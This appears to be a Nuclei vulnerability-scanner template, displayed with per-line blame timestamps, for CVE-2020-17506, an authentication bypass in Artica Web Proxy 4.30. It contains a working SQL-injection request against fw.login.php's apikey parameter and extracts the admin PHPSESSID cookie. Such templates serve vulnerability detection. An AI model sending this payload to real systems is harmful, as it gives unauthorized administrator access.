2021-01-02 04:56:15 +00:00
id : CVE-2020-17506
2020-08-20 15:11:34 +00:00
info :
2022-04-29 19:58:07 +00:00
name : Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection
2020-08-20 15:11:34 +00:00
author : dwisiswant0
severity : critical
2020-08-25 22:43:40 +00:00
description : Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
2022-04-22 10:38:41 +00:00
reference :
- https://blog.max0x4141.com/post/artica_proxy/
2022-04-29 19:58:07 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17506
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/158868/Artica-Proxy-4.3.0-Authentication-Bypass.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-17506
cwe-id : CWE-89
2022-08-27 04:41:18 +00:00
tags : cve,cve2020,artica,proxy,packetstorm
2020-08-20 15:11:34 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
2022-05-08 06:43:38 +00:00
2022-10-07 21:27:25 +00:00
host-redirects : true
2020-08-24 04:39:40 +00:00
max-redirects : 1
2020-08-20 15:11:34 +00:00
matchers-condition : and
matchers :
2020-08-24 04:39:40 +00:00
- type : word
words :
- "artica-applianc"
2022-05-08 06:43:38 +00:00
2020-08-20 15:11:34 +00:00
- type : status
status :
- 200
- 301
- 302
condition : or
2022-05-08 06:43:38 +00:00
2020-08-20 15:11:34 +00:00
- type : word
2022-05-08 06:43:38 +00:00
part : header
2020-08-20 15:11:34 +00:00
words :
- "PHPSESSID"
2022-05-08 06:43:38 +00:00
2020-08-20 15:11:34 +00:00
extractors :
- type : kval
kval :
2020-08-25 22:43:40 +00:00
- "PHPSESSID"
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/27